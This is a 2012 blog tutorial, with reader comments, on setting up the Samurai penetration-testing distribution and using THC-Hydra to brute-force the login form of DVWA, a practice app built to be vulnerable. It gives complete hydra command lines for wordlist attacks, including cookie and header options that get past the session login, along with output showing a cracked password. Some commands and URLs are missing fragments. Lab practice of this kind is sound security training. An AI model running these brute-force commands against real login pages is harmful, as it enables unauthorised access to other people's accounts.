Friday, January 6, 2012

Using Samurai to Brute Force HTTP logins

In this tutorial I am going to show you how to brute force HTTP login forms using Samurai, a penetration testing distribution by InGuardians. I will be doing this in a virtual environment using VMWare.

Required Tools:

You can download Samurai here.
You can download VMWare Player here.
You can download 7zip here.


I am going to assume you have some computer knowledge, and know how to download and install VMWare Player and 7zip.

Installing Samurai in VMWare:

1. Open VMWare Player and click Create a New Virtual Machine.

2. When the New Virtual Machine Wizard opens select I will install the operating system later and click Next.

3. On the Select a Guest Operating System screen select Linux as the Guest operating system and Ubuntu as the Version and click Next.

4. On the Name the Virtual Machine screen name the virtual machine anything you want, and select the proper location to create it (you will probably leave this in the default location) and click Next.

5. On the Specify Disk Capacity screen select the size of hard drive you want to use, and if you want to store it as a single file or multiple files (I recommend you leave the default values) and click Next.

6. On the Ready to Create Virtual Machine screen you may customize the hardware however you like, or leave it all the same. Click Finish when ready.

7. Now you should see your new Virtual Machine in VMWare Player, select it and click Edit virtual machine settings.

8. On the Virtual Machine Settings screen select CD/DVD (IDE) and change the Connection to Use ISO image file: and browse and select the Samurai ISO you downloaded (or download it now if you didnt, the link is at the top of the page) and click OK.

9. Select your virtual machine and click Play virtual machine to continue with the installation and configuration of Samurai.

10. When the virtual machine loads it will ask you to select a boot option, type in install and press Enter.

11. When the installation GUI loads it will ask you to select your language. I leave it on English and click Forward.

12. Next it will ask you for your timezone, select your Region and the City closest to you and click Forward.

13. Next it will ask you for your keyboard layout, select the one you use and click Forward.

14. Now it will want you to select your hard drive partitions. Select Use the entire disk and click Forward.

15. Now it will ask you your name, username, password, computer name, and how you want to log in. Enter the information you want and click Finish when ready.

16. Finally it will give you an overview of the installation, select Install when you are ready and the installation will begin.

17. Once the installation finishes, click Restart Now and you have a Samurai Virtual Machine to practice Penetration Testing with!

Updating the tools and fixing hydra:

Once your Samurai desktop loads, it is a good idea to update the tools and fix the memory problem in hydra.

1. To update the tools click Applications > Samurai SVN > Update all SVN/CVS tools.

2. When the command line starts and asks you what you would like to do, enter B to backup and update all tools and press Enter. (If it asks you for the sudo password type in samurai).

This is a long process, but once it has completed all of your tools will be up to date and we will install and patch the newest version of hydra to get rid of some bugs.

1. Open a terminal and download the THC-Hydra source code:
wget -c

 2. Extract the source code and go into the hydra source code directory:
tar -xvzf hydra-7.1-src.tar.gz
cd hydra-7.1-src

5. Configure the source for our environment.

 6. Compile hydra (this is a long process):

7.  Install hydra (if it asks for the sudo password type in samurai):
sudo make install

 All done! Now we can perform the bruteforce attack!

Performing the attack:

When I did this it took me approximately 2 minutes to find the password for the admin user. You can use firefox and download the wordlist I use from Openwall (they have many other, larger wordlists too but we don't need anything bigger for this demonstration).

1. Open up a terminal by either clicking the terminal icon or going to Applications > Accessories > Terminal.

2. Enter the text below, we want to get the password for the admin user.
hydra -l admin -P /home/samurai/Documents/lower.lst dvwa http-get-form "/vulnerabilities/brute/index.php:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect."

Breakdown of command:

  • hydra - Starts the hydra program.
  • -l - Used to set a single username to try our brute force with (use -L to specify a list of usernames).
  • admin - The username we are trying to bruteforce.
  • -P - Used to specify a list of passwords to try for each username provided (use -p for a single password to try).
  • /home/samurai/Documents/lower.lst - The path and filename of the list of words we want to try as passwords for each username.
  • dvwa - The hostname or root of where we are trying to bruteforce (Some other examples could be or
  • http-get-form - Specifies the protocol we are using.
  • "/vulnerabilities/brute/index.php - Specifies the path from the hostname to the form we are trying to bruteforce.
  • :username - Tells hydra the name of the username field (this can be many things, look at the html source code to find out what it is).
  • =^USER^ - This tells hydra to put each username we want to try in this spot.
  • &password - This tells hydra the name of the password field (this can be many things, look at the html source code to find out what it is).
  • =^PASS^ - This tells hydra to put each password we want to try in this spot.
  • &Login=Login - This is an extra part of this particular form (this can be many things, even multiple, look at the html source code to find out what it is).
  • :Username and/or password incorrect." - This is the string that tells hydra when a username and password combination has failed.
 You can test that the username admin and password password are the correct information by opening firefox and going to the http://dvwa/vulnerabilities/brute/index.php and trying them out for yourself!


I was working on a problem where the optional flag H= was working incorrectly (getting syntax errors) however thanks to VH over at this problem has been resolved (although you will need to patch/update to 7.2 when it is released).

Some information about the optional flags:

C= flag allows you to tell hydra to get its cookies from somewhere else.
H= flag allows you to set your own header fields (like defining a phpsessid for bypassing the initial login page on a standard DVWA installation).


hydra -l admin -p admin http-get-form "/vulnerabilities/brute/index.php:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.C=/dvwa/login.php"

In this example, we using the H= optional flag to tell Hydra to get the cookie from the login.php page instead of the standard /vulnerabilities/brute/index.php page.

hydra -l admin -p admin http-get-form "/vulnerabilities/brute/index.php:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie: security=high; PHPSESSID=e40sd7ged0o6s79gc93e57v955"

In this example, we use the H= optional flag to set two Cookie: header fields. We make sure the "security" of DVWA is high and set our PHPSESSID to the value of my PHPSESSID in firefox that has already logged in on the first page. With these adjustments I am able to successfully attack the bruteforce vulnerability of DVWA behind the initial login page.

If you have any questions or would like to share any additional information, please comment below. I will be posting more guides as time allows.


  1. This is a really interesting walkthrough.

    I am currently trying to do something similar with Hydra using Backtrack 5.

    The thing I am stuck on is, when I try and bruteforce vulnerabilities/brute/index.php Hydra gets redirected to the main DVWA login page. (Found this out by making Hydra route through Burp Proxy) How did you get around this? Have I missed something obvious?

    1. Actually, I was initially going to do this with Backtrack 5 and OWASP's Vulnerable VM but ran into the same issues.

      The issue lies in the fact that you need to log into DVWA in order to access the /vulnerable/brute directory (or any directory for that matter).

      The reason I went with Samurai instead is because I didn't want to have to play with it to get around the login page, and I do not fully understand how to use the commands needed to get around this.

      You need to set the PHPSESSID cookie by using either the C= or H= command (to read about these do hydra -U http-get-form and they are optional flags). From my understanding you would need to do something similar to:

      hydra -l admin -p admin dvwa http-get-form "/vulnerabilities/brute/index.php:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie=PHPSESSID=mgo7mhnlmtoa7cijjfspdd4i14"

      However, I have been unsuccessful in getting that to work, although it does not timeout or prevent you from connecting which is a step in the right direction. I will do some more research and let you know what I come up with, and thank you for asking such a brilliant question. Time to learn!

    2. Alright, after spending some time talking to the guys over at THC (thanks vh!) we figured out a source code issue so until you get the patched hydra.c and hydra-http-form.c when they update to 7.2 this probably still won't work for you.

      However, the following syntax worked for me:

      root@bt:~/Desktop# hydra -l admin -p admin http-get-form "/vulnerabilities/brute/index.php:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie: security=high; PHPSESSID=e40sd7ged0o6s79gc93e57v955"

      Hydra v7.2 (c)2011 by van Hauser/THC & David Maciejak - for legal purposes only

      Hydra ( starting at 2012-02-03 11:22:03
      [DATA] 1 task, 1 server, 1 login try (l:1/p:1), ~1 try per task
      [DATA] attacking service http-get-form on port 80
      [80][www-form] host: login: admin password: admin
      [STATUS] attack finished for (waiting for children to finish)
      1 of 1 target successfuly completed, 1 valid password found
      Hydra ( finished at 2012-02-03 11:22:04